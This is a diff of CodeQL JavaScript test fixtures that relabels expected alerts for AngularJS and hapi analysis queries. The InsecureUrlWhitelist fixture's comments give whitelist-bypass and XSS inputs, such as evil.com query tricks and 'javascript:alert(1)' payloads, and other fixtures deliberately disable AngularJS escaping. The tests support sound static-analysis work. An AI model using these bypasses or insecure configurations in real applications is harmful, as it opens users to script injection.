| | src/hapiglue.js:28:3:28:9 | request | src/hapiglue.js:20:1:29:1 | functio ... oken;\\n} | | src/hapiglue.js:36:22:36:24 | req | src/hapiglue.js:36:12:36:33 | functio ... hapi){} | +| src/hapihapi.js:13:32:13:38 | request | src/hapihapi.js:13:14:15:5 | functio ... n\\n } | +| src/hapihapi.js:13:32:13:38 | request | src/hapihapi.js:13:14:15:5 | functio ... n\\n } | +| src/hapihapi.js:14:9:14:15 | request | src/hapihapi.js:13:14:15:5 | functio ... n\\n } | +| src/hapihapi.js:17:48:17:54 | request | src/hapihapi.js:17:30:18:1 | functio ... ndler\\n} | +| src/hapihapi.js:20:19:20:25 | request | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:20:19:20:25 | request | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:21:3:21:9 | request | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:22:3:22:9 | request | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:23:3:23:9 | request | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:24:3:24:9 | request | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:25:3:25:9 | request | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:26:3:26:9 | request | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:34:22:34:24 | req | src/hapihapi.js:34:12:34:30 | function (req, h){} | test_HeaderAccess | src/hapi.js:25:3:25:21 | request.headers.baz | baz | | src/hapiglue.js:27:3:27:21 | request.headers.baz | baz | +| src/hapihapi.js:25:3:25:21 | request.headers.baz | baz | test_ResponseExpr | src/hapi.js:14:9:14:24 | request.response | src/hapi.js:13:14:15:5 | functio ... n\\n } | | src/hapiglue.js:14:9:14:24 | request.response | src/hapiglue.js:13:14:15:5 | functio ... n\\n } | +| src/hapihapi.js:14:9:14:24 | request.response | src/hapihapi.js:13:14:15:5 | functio ... n\\n } | test_RouteHandler | src/hapi.js:6:1:6:21 | functio ... er1(){} | src/hapi.js:4:15:4:31 | new Hapi.Server() | | src/hapi.js:13:14:15:5 | functio ... n\\n } | src/hapi.js:4:15:4:31 | new Hapi.Server() | @@ -55,9 +75,15 @@ test_RouteHandler | src/hapiglue.js:17:30:18:1 | functio ... ndler\\n} | src/hapiglue.js:4:15:4:69 | new Hap ... ptions) | | src/hapiglue.js:20:1:29:1 | functio ... oken;\\n} | src/hapiglue.js:4:15:4:69 | new Hap ... ptions) | | src/hapiglue.js:36:12:36:33 | functio ... hapi){} | src/hapiglue.js:4:15:4:69 | new Hap ... ptions) | +| src/hapihapi.js:6:1:6:21 | functio ... er1(){} | src/hapihapi.js:4:15:4:31 | new Hapi.Server() | +| src/hapihapi.js:13:14:15:5 | functio ... n\\n } | src/hapihapi.js:4:15:4:31 | new Hapi.Server() | +| src/hapihapi.js:17:30:18:1 | functio ... ndler\\n} | src/hapihapi.js:4:15:4:31 | new Hapi.Server() | +| src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | src/hapihapi.js:4:15:4:31 | new Hapi.Server() | +| src/hapihapi.js:34:12:34:30 | function (req, h){} | src/hapihapi.js:4:15:4:31 | new Hapi.Server() | test_HeaderDefinition | src/hapi.js:14:9:14:46 | request ... 1', '') | src/hapi.js:13:14:15:5 | functio ... n\\n } | | src/hapiglue.js:14:9:14:46 | request ... 1', '') | src/hapiglue.js:13:14:15:5 | functio ... n\\n } | +| src/hapihapi.js:14:9:14:46 | request ... 1', '') | src/hapihapi.js:13:14:15:5 | functio ... n\\n } | test_ServerDefinition | src/hapi.js:1:15:1:44 | new (re ... erver() | | src/hapi.js:4:15:4:31 | new Hapi.Server() | @@ -65,6 +91,8 @@ test_ServerDefinition | src/hapiglue.js:4:15:4:69 | new Hap ... ptions) | | src/hapiglue.js:43:19:43:24 | server | | src/hapiglue.js:44:45:44:51 | server_ | +| src/hapihapi.js:1:15:1:50 | new (re ... erver() | +| src/hapihapi.js:4:15:4:31 | new Hapi.Server() | test_RequestInputAccess | src/hapi.js:21:3:21:20 | request.rawPayload | body | src/hapi.js:20:1:27:1 | functio ... oken;\\n} | | src/hapi.js:22:3:22:21 | request.payload.foo | body | src/hapi.js:20:1:27:1 | functio ... oken;\\n} | @@ -80,6 +108,12 @@ test_RequestInputAccess | src/hapiglue.js:26:3:26:20 | request.url.origin | url | src/hapiglue.js:20:1:29:1 | functio ... oken;\\n} | | src/hapiglue.js:27:3:27:21 | request.headers.baz | header | src/hapiglue.js:20:1:29:1 | functio ... oken;\\n} | | src/hapiglue.js:28:3:28:21 | request.state.token | cookie | src/hapiglue.js:20:1:29:1 | functio ... oken;\\n} | +| src/hapihapi.js:21:3:21:20 | request.rawPayload | body | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:22:3:22:21 | request.payload.foo | body | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:23:3:23:19 | request.query.bar | parameter | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:24:3:24:18 | request.url.path | url | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:25:3:25:21 | request.headers.baz | header | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:26:3:26:21 | request.state.token | cookie | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | test_RouteSetup_getServer | src/hapi.js:7:1:9:2 | server2 ... ler1\\n}) | src/hapi.js:4:15:4:31 | new Hapi.Server() | | src/hapi.js:12:1:15:7 | server2 ... }}) | src/hapi.js:4:15:4:31 | new Hapi.Server() | @@ -91,9 +125,15 @@ test_RouteSetup_getServer | src/hapiglue.js:17:1:18:2 | server2 ... dler\\n}) | src/hapiglue.js:4:15:4:69 | new Hap ... ptions) | | src/hapiglue.js:31:1:31:20 | server2.route(route) | src/hapiglue.js:4:15:4:69 | new Hap ... ptions) | | src/hapiglue.js:38:1:38:38 | server2 ... ler()}) | src/hapiglue.js:4:15:4:69 | new Hap ... ptions) | +| src/hapihapi.js:7:1:9:2 | server2 ... ler1\\n}) | src/hapihapi.js:4:15:4:31 | new Hapi.Server() | +| src/hapihapi.js:12:1:15:7 | server2 ... }}) | src/hapihapi.js:4:15:4:31 | new Hapi.Server() | +| src/hapihapi.js:17:1:18:2 | server2 ... dler\\n}) | src/hapihapi.js:4:15:4:31 | new Hapi.Server() | +| src/hapihapi.js:29:1:29:20 | server2.route(route) | src/hapihapi.js:4:15:4:31 | new Hapi.Server() | +| src/hapihapi.js:36:1:36:38 | server2 ... ler()}) | src/hapihapi.js:4:15:4:31 | new Hapi.Server() | test_HeaderDefinition_defines | src/hapi.js:14:9:14:46 | request ... 1', '') | header1 | | | src/hapiglue.js:14:9:14:46 | request ... 1', '') | header1 | | +| src/hapihapi.js:14:9:14:46 | request ... 1', '') | header1 | | test_RouteSetup_getARouteHandler | src/hapi.js:7:1:9:2 | server2 ... ler1\\n}) | src/hapi.js:6:1:6:21 | functio ... er1(){} | | src/hapi.js:12:1:15:7 | server2 ... }}) | src/hapi.js:13:14:15:5 | functio ... n\\n } | @@ -109,6 +149,13 @@ test_RouteSetup_getARouteHandler | src/hapiglue.js:38:1:38:38 | server2 ... ler()}) | src/hapiglue.js:35:1:37:1 | return of function getHandler | | src/hapiglue.js:38:1:38:38 | server2 ... ler()}) | src/hapiglue.js:36:12:36:33 | functio ... hapi){} | | src/hapiglue.js:38:1:38:38 | server2 ... ler()}) | src/hapiglue.js:38:25:38:36 | getHandler() | +| src/hapihapi.js:7:1:9:2 | server2 ... ler1\\n}) | src/hapihapi.js:6:1:6:21 | functio ... er1(){} | +| src/hapihapi.js:12:1:15:7 | server2 ... }}) | src/hapihapi.js:13:14:15:5 | functio ... n\\n } | +| src/hapihapi.js:17:1:18:2 | server2 ... dler\\n}) | src/hapihapi.js:17:30:18:1 | functio ... ndler\\n} | +| src/hapihapi.js:29:1:29:20 | server2.route(route) | src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | +| src/hapihapi.js:36:1:36:38 | server2 ... ler()}) | src/hapihapi.js:33:1:35:1 | return of function getHandler | +| src/hapihapi.js:36:1:36:38 | server2 ... ler()}) | src/hapihapi.js:34:12:34:30 | function (req, h){} | +| src/hapihapi.js:36:1:36:38 | server2 ... ler()}) | src/hapihapi.js:36:25:36:36 | getHandler() | test_RouteHandler_getARequestExpr | src/hapi.js:13:14:15:5 | functio ... n\\n } | src/hapi.js:13:32:13:38 | request | | src/hapi.js:13:14:15:5 | functio ... n\\n } | src/hapi.js:13:32:13:38 | request | @@ -138,9 +185,24 @@ test_RouteHandler_getARequestExpr | src/hapiglue.js:20:1:29:1 | functio ... oken;\\n} | src/hapiglue.js:27:3:27:9 | request | | src/hapiglue.js:20:1:29:1 | functio ... oken;\\n} | src/hapiglue.js:28:3:28:9 | request | | src/hapiglue.js:36:12:36:33 | functio ... hapi){} | src/hapiglue.js:36:22:36:24 | req | +| src/hapihapi.js:13:14:15:5 | functio ... n\\n } | src/hapihapi.js:13:32:13:38 | request | +| src/hapihapi.js:13:14:15:5 | functio ... n\\n } | src/hapihapi.js:13:32:13:38 | request | +| src/hapihapi.js:13:14:15:5 | functio ... n\\n } | src/hapihapi.js:14:9:14:15 | request | +| src/hapihapi.js:17:30:18:1 | functio ... ndler\\n} | src/hapihapi.js:17:48:17:54 | request | +| src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | src/hapihapi.js:20:19:20:25 | request | +| src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | src/hapihapi.js:20:19:20:25 | request | +| src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | src/hapihapi.js:21:3:21:9 | request | +| src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | src/hapihapi.js:22:3:22:9 | request | +| src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | src/hapihapi.js:23:3:23:9 | request | +| src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | src/hapihapi.js:24:3:24:9 | request | +| src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | src/hapihapi.js:25:3:25:9 | request | +| src/hapihapi.js:20:1:27:1 | functio ... oken;\\n} | src/hapihapi.js:26:3:26:9 | request | +| src/hapihapi.js:34:12:34:30 | function (req, h){} | src/hapihapi.js:34:22:34:24 | req | test_HeaderDefinition_getAHeaderName | src/hapi.js:14:9:14:46 | request ... 1', '') | header1 | | src/hapiglue.js:14:9:14:46 | request ... 1', '') | header1 | +| src/hapihapi.js:14:9:14:46 | request ... 1', '') | header1 | test_RouteHandler_getAResponseHeader | src/hapi.js:13:14:15:5 | functio ... n\\n } | header1 | src/hapi.js:14:9:14:46 | request ... 1', '') | | src/hapiglue.js:13:14:15:5 | functio ... n\\n } | header1 | src/hapiglue.js:14:9:14:46 | request ... 1', '') | +| src/hapihapi.js:13:14:15:5 | functio ... n\\n } | header1 | src/hapihapi.js:14:9:14:46 | request ... 1', '') | diff --git a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref index a29deed369ec..9d7d0764c034 100644 --- a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref +++ b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/DeadAngularJSEventListener.qlref @@ -1 +1,2 @@ -AngularJS/DeadAngularJSEventListener.ql \ No newline at end of file +query: AngularJS/DeadAngularJSEventListener.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js index d8616c9e2399..58b700a4c3f2 100644 --- a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js @@ -1,50 +1,50 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on('destroy', cleanup); // BAD + $scope.$on('destroy', cleanup); // $ Alert }) .controller('MyController', ["$scope", function(s) { - s.$on('destroy', cleanup); // BAD + s.$on('destroy', cleanup); // $ Alert }]) .controller('MyController', function($scope) { var destroy = 'destroy'; - $scope.$on(destroy, cleanup); // BAD + $scope.$on(destroy, cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$destroy', cleanup); // GOOD + $scope.$on('$destroy', cleanup); }) .controller('MyController', function($scope) { $scope.$emit('foo'); - $scope.$on('foo', cleanup); // GOOD + $scope.$on('foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('bar', cleanup); // BAD + $scope.$on('bar', cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$locationChangeStart', cleanup); // OK + $scope.$on('$locationChangeStart', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib1.foo', cleanup); // OK + $scope.$on('lib1.foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib2:foo', cleanup); // OK + $scope.$on('lib2:foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('onClick', cleanup); // OK + $scope.$on('onClick', cleanup); }) .controller('MyController', function($scope) { function f($scope){ $scope.$emit('probablyFromUserCode1') } - $scope.$on('probablyFromUserCode1', cleanup); // OK + $scope.$on('probablyFromUserCode1', cleanup); }) .controller('MyController', function($scope) { function f($scope){ var scope = $scope; scope.$emit('probablyFromUserCode2') } - $scope.$on('probablyFromUserCode2', cleanup); // OK + $scope.$on('probablyFromUserCode2', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('event-from-AngularJS-expression', cleanup); // GOOD + $scope.$on('event-from-AngularJS-expression', cleanup); }) ; diff --git a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref index f7a0044a73f8..7089aacb60e6 100644 --- a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref +++ b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/DependencyMismatch.qlref @@ -1 +1,2 @@ -AngularJS/DependencyMismatch.ql \ No newline at end of file +query: AngularJS/DependencyMismatch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js index c60a937b4c45..3afff0e3a50b 100644 --- a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js @@ -1,36 +1,36 @@ angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // NOT OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // $ Alert angular.module('app2') - .directive('mydirective', [ '$compile', function($compile, $http) { // NOT OK + .directive('mydirective', [ '$compile', function($compile, $http) { // $ Alert // ... }]); angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); // OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); angular.module('app2') - .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // OK + .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // ... }]); angular.module('app3', []) - .run(function(dep1, dep3) {}); // OK + .run(function(dep1, dep3) {}); angular.module('app4') - .directive('mydirective', function($compile, $http) { // OK + .directive('mydirective', function($compile, $http) { // ... }); angular.module('app5') - .directive('mydirective', [ 'fully.qualified.name', function(name) { // OK + .directive('mydirective', [ 'fully.qualified.name', function(name) { // ... }]) angular.module('app6') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js index 2ef8930246f9..312af00754e6 100644 --- a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js +++ b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js @@ -1,17 +1,17 @@ angular.module('app', []) .config(function($sceProvider) { - $sceProvider.enabled(false); // BAD + $sceProvider.enabled(false); // $ Alert }) .config(['otherProvider', function($sceProvider) { - $sceProvider.enabled(false); // OK + $sceProvider.enabled(false); }]) .config(['$sceProvider', function(x) { - x.enabled(false); // BAD + x.enabled(false); // $ Alert }]) .config(function($sceProvider) { - $sceProvider.enabled(true); // OK + $sceProvider.enabled(true); }) .config(function($sceProvider) { var x = false; - $sceProvider.enabled(x); // BAD + $sceProvider.enabled(x); // $ Alert }); diff --git a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref index 7a74c3338a31..0e0c8bd12433 100644 --- a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref +++ b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.qlref @@ -1 +1,2 @@ -AngularJS/DisablingSce.ql \ No newline at end of file +query: AngularJS/DisablingSce.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref index 05ed8405fa82..b1ad3523f06f 100644 --- a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref +++ b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/DoubleCompilation.qlref @@ -1 +1,2 @@ -AngularJS/DoubleCompilation.ql +query: AngularJS/DoubleCompilation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js index f46e74bc7e97..c1248255132b 100644 --- a/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js +++ b/javascript/ql/test/query-tests/AngularJS/DoubleCompilation/bad.js @@ -11,7 +11,7 @@ angular.module('app').directive('addMouseover', function($compile) { attrs.$set('addMouseover', null); // To stop infinite compile loop element.append(newEl); - $compile(element)(scope); // Double compilation + $compile(element)(scope); // $ Alert - Double compilation } } }) diff --git a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref index 24c81938cc3e..0a670daee6df 100644 --- a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref +++ b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/IncompatibleService.qlref @@ -1 +1,2 @@ -AngularJS/IncompatibleService.ql \ No newline at end of file +query: AngularJS/IncompatibleService.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js index 51dbd1f76d48..c3855f207c04 100644 --- a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js +++ b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js @@ -11,68 +11,68 @@ angular.module('myModule', []) ; angular.module('myModule2', []) - .controller('c0', function(factoryId){}) // OK - .controller('c1', function(serviceId){}) // OK - .controller('c2', function(valueId){}) // OK - .controller('c3', function(constantId){}) // OK - .controller('c4', function(providerId){}) // OK - .controller('c5', function($http){}) // OK - .controller('c6', function($provider){}) // NOT OK - .controller('c7', function($scope){}) // OK - .controller('c8', function($compile){}) // OK - .controller('c9', function(UNKNOWN){}) // OK - .controller('c10', function(providerIdProvider){}) // NOT OK - .controller('c11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .controller('c12', function($provide){}) // OK (special case) - .controller('c13', function(providerId2Provider){}) // NOT OK + .controller('c0', function(factoryId){}) + .controller('c1', function(serviceId){}) + .controller('c2', function(valueId){}) + .controller('c3', function(constantId){}) + .controller('c4', function(providerId){}) + .controller('c5', function($http){}) + .controller('c6', function($provider){}) // $ Alert + .controller('c7', function($scope){}) + .controller('c8', function($compile){}) + .controller('c9', function(UNKNOWN){}) + .controller('c10', function(providerIdProvider){}) // $ Alert + .controller('c11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .controller('c12', function($provide){}) // OK - special case + .controller('c13', function(providerId2Provider){}) // $ Alert - .factory('s0', function(factoryId){}) // OK - .factory('s1', function(serviceId){}) // OK - .factory('s2', function(valueId){}) // OK - .factory('s3', function(constantId){}) // OK - .factory('s4', function(providerId){}) // OK - .factory('s5', function($http){}) // OK - .factory('s6', function($provider){}) // NOT OK - .factory('s7', function($scope){}) // NOT OK - .factory('s8', function($compile){}) // OK - .factory('s9', function(UNKNOWN){}) // OK - .factory('s10', function(providerIdProvider){}) // NOT OK - .factory('s11', function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .factory('s12', function($provide){}) // OK (special case) - .factory('s13', function(providerId2Provider){}) // NOT OK + .factory('s0', function(factoryId){}) + .factory('s1', function(serviceId){}) + .factory('s2', function(valueId){}) + .factory('s3', function(constantId){}) + .factory('s4', function(providerId){}) + .factory('s5', function($http){}) + .factory('s6', function($provider){}) // $ Alert + .factory('s7', function($scope){}) // $ Alert + .factory('s8', function($compile){}) + .factory('s9', function(UNKNOWN){}) + .factory('s10', function(providerIdProvider){}) // $ Alert + .factory('s11', function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .factory('s12', function($provide){}) // OK - special case + .factory('s13', function(providerId2Provider){}) // $ Alert - .run(function(factoryId){}) // OK - .run(function(serviceId){}) // OK - .run(function(valueId){}) // OK - .run(function(constantId){}) // OK - .run(function(providerId){}) // OK - .run(function($http){}) // OK - .run(function($provider){}) // NOT OK - .run(function($scope){}) // NOT OK - .run(function($compile){}) // OK - .run(function(UNKNOWN){}) // OK - .run(function(providerIdProvider){}) // NOT OK - .run(function(providerIdProvider, UNKNOWN){}) // NOT OK, but only one error - .run(function($provide){}) // OK (special case) - .run(function(providerId2Provider){}) // NOT OK + .run(function(factoryId){}) + .run(function(serviceId){}) + .run(function(valueId){}) + .run(function(constantId){}) + .run(function(providerId){}) + .run(function($http){}) + .run(function($provider){}) // $ Alert + .run(function($scope){}) // $ Alert + .run(function($compile){}) + .run(function(UNKNOWN){}) + .run(function(providerIdProvider){}) // $ Alert + .run(function(providerIdProvider, UNKNOWN){}) // $ Alert - but only one error + .run(function($provide){}) // OK - special case + .run(function(providerId2Provider){}) // $ Alert - .config(function(factoryId){}) // NOT OK - .config(function(serviceId){}) // NOT OK - .config(function(valueId){}) // NOT OK - .config(function(constantId){}) // OK - .config(function(providerId){}) // NOT OK - .config(function($http){}) // NOT OK - .config(function($provider){}) // OK - .config(function($scope){}) // NOT OK - .config(function($compile){}) // OK - .config(function(UNKNOWN){}) // OK - .config(function(providerIdProvider){}) // OK - .config(function(providerId, UNKNOWN){}) // NOT OK, but only one error - .config(function($provide){}) // OK (special case) - .config(function(valueId2){}) // NOT OK + .config(function(factoryId){}) // $ Alert + .config(function(serviceId){}) // $ Alert + .config(function(valueId){}) // $ Alert + .config(function(constantId){}) + .config(function(providerId){}) // $ Alert + .config(function($http){}) // $ Alert + .config(function($provider){}) + .config(function($scope){}) // $ Alert + .config(function($compile){}) + .config(function(UNKNOWN){}) + .config(function(providerIdProvider){}) + .config(function(providerId, UNKNOWN){}) // $ Alert - but only one error + .config(function($provide){}) // OK - special case + .config(function(valueId2){}) // $ Alert // service: same restrcitions as .factory - .service('s14', function(factoryId){}) // OK - .service('s15', function($provider){}) // NOT OK + .service('s14', function(factoryId){}) + .service('s15', function($provider){}) // $ Alert ; diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref index 26714392ac84..7c18e955f64c 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/InsecureUrlWhitelist.qlref @@ -1 +1,2 @@ -AngularJS/InsecureUrlWhitelist.ql \ No newline at end of file +query: AngularJS/InsecureUrlWhitelist.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js index 713e36e52233..1ee742c6d6a2 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js @@ -1,24 +1,24 @@ angular.module('myApp', []) .config(function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ - "**://example.com/*", // BAD (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) - "*://example.org/*", // BAD (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) - "https://**.example.com/*", // BAD (exploit: https://evil.com/?ignore=://example.com/a) - "https://example.**", // BAD (exploit: https://example.evil.com or http://example.:foo@evil.com) - "https://example.*", // BAD (exploit: https://example.UnexpectedTLD) + "**://example.com/*", // $ RelatedLocation - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) + "*://example.org/*", // $ RelatedLocation - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) + "https://**.example.com/*", // $ RelatedLocation - exploit: https://evil.com/?ignore=://example.com/a + "https://example.**", // $ RelatedLocation - exploit: https://example.evil.com or http://example.:foo@evil.com + "https://example.*", // $ RelatedLocation - exploit: https://example.UnexpectedTLD - "https://example.com", // OK - "https://example.com/**", // OK - "https://example.com/*", // OK - "https://example.com/foo/*", // OK - "https://example.com/foo/**", // OK - "https://example.com/foo/*/bar", // OK - "https://example.com/foo/**/bar", // OK - "https://example.com/?**", // OK - "https://example.com/?**://example.com", // OK + "https://example.com", + "https://example.com/**", + "https://example.com/*", + "https://example.com/foo/*", + "https://example.com/foo/**", + "https://example.com/foo/*/bar", + "https://example.com/foo/**/bar", + "https://example.com/?**", + "https://example.com/?**://example.com", "https://*.example.com", // not flagged: - /http:\/\/www.example.org/g // BAD (exploit http://wwwaexample.org (dots are not escaped)) - ]); + /http:\/\/www.example.org/g // $ MISSING: RelatedLocation - (exploit http://wwwaexample.org (dots are not escaped)) + ]); // $ Alert }); diff --git a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref index 67c8ca36e697..5de5a3bd1b11 100644 --- a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref +++ b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/MissingExplicitInjection.qlref @@ -1 +1,2 @@ -AngularJS/MissingExplicitInjection.ql \ No newline at end of file +query: AngularJS/MissingExplicitInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js index 65d3e74ceef0..629b62d5b08e 100644 --- a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js @@ -1,27 +1,27 @@ (function(){ - function injected1(name){} // NOT OK + function injected1(name){} // $ Alert angular.module('app1').controller('controller1', injected1); - function injected2(name){} // OK + function injected2(name){} injected2.$inject = ['name']; angular.module('app2').controller('controller2', injected2); - function injected3(name){} // OK + function injected3(name){} angular.module('app3').controller('controller3', ['name', injected3]); - angular.module('app4').controller('controller4', function(){}); // OK + angular.module('app4').controller('controller4', function(){}); - angular.module('app5').controller('controller5', function(name){}); // NOT OK + angular.module('app5').controller('controller5', function(name){}); // $ Alert - function injected6(){} // OK + function injected6(){} angular.module('app6').controller('controller6', injected6); - function notInjected7(name){} // OK + function notInjected7(name){} var obj7 = { controller: notInjected7 }; - function injected8(name){} // OK (false negative: we do not track through properties) + function injected8(name){} // OK - false negative: we do not track through properties var obj8 = { controller: injected8 }; @@ -29,14 +29,14 @@ var $injector = angular.injector(); - function injected9(name){} // NOT OK + function injected9(name){} // $ Alert $injector.invoke(injected9) - function injected10(name){} // OK + function injected10(name){} injected10.$inject = ['name']; $injector.invoke(injected10) - function injected11(name){} // OK + function injected11(name){} $injector.invoke(['name', injected11]) })(); diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected index 227dcedf486c..ceb747011ba8 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected @@ -2,5 +2,5 @@ | repeated-injection.js:6:5:6:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:8:54:8:73 | ['name', $Injected2] | dependency injections | | 